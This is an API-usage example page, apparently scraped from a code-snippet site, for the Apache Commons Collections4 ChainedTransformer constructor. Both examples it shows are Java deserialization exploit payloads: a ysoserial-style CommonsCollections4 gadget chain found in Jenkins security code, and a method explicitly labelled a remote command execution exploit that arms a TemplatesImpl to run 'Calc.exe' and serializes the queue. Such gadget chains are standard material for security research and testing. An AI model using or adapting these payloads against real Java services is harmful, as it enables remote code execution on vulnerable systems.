Example usage for org.apache.commons.collections4.functors ChainedTransformer ChainedTransformer

List of usage examples for org.apache.commons.collections4.functors ChainedTransformer ChainedTransformer

  1. HOME
  2. Java
  3. org.apache.commons
  4. org.apache.commons.collections4.functors.*
  5. ChainedTransformer
  6. ChainedTransformer

Introduction

In this page you can find the example usage for org.apache.commons.collections4.functors ChainedTransformer ChainedTransformer.

Prototype

public ChainedTransformer(final Transformer<? super T, ? extends T>... transformers)

Source Link

Document

Constructor that performs no validation.

Usage

From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections4.java

public Queue<Object> getObject(final String command) throws Exception {
    Object templates = Gadgets.createTemplatesImpl(command);

    ConstantTransformer constant = new ConstantTransformer(String.class);

    // mock method name until armed
    Class[] paramTypes = new Class[] { String.class };
    Object[] args = new Object[] { "foo" };
    InstantiateTransformer instantiate = new InstantiateTransformer(paramTypes, args);

    // grab defensively copied arrays
    paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
    args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

    ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

    // create queue with numbers
    PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
    queue.add(1);// w  w  w. ja v a 2s. c o m
    queue.add(1);

    // swap in values to arm
    Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
    paramTypes[0] = Templates.class;
    args[0] = templates;

    return queue;
}

From source file:ser05j.RCE.java

/**
 * Creates a Remote Command Execution Exploit based on Apache Commons Collections4 4.0
 *
 * @throws Exception for <i>everything</i>.
 * @return a byte array containing the serialized queue
 */// w w w.j av a  2s  . co  m
private static byte[] RCEpayload() throws Exception {

    Object templates = Gadgets.createTemplatesImpl("Calc.exe");
    // Object templates = Gadgets.createTemplatesImpl("write .gitignore"); 

    ConstantTransformer<Object, Class<String>> constant = new ConstantTransformer<>(String.class);

    // mock method name until armed
    Class<?>[] paramTypes = new Class[] { String.class };
    Object[] args = new Object[] { "foo" };
    InstantiateTransformer<?> instantiate = new InstantiateTransformer<>(paramTypes, args);

    // grab defensively copied arrays
    paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
    args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

    @SuppressWarnings("unchecked")
    Transformer<Object, Object> chain = new ChainedTransformer<Object>(
            new Transformer[] { constant, instantiate });

    // create queue with numbers
    PriorityQueue<Object> queue = new PriorityQueue<>(2, new TransformingComparator<>(chain));
    queue.add(1);
    queue.add(1);

    // swap in values to arm
    Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
    paramTypes[0] = Templates.class;
    args[0] = templates;

    return serialize(queue);
}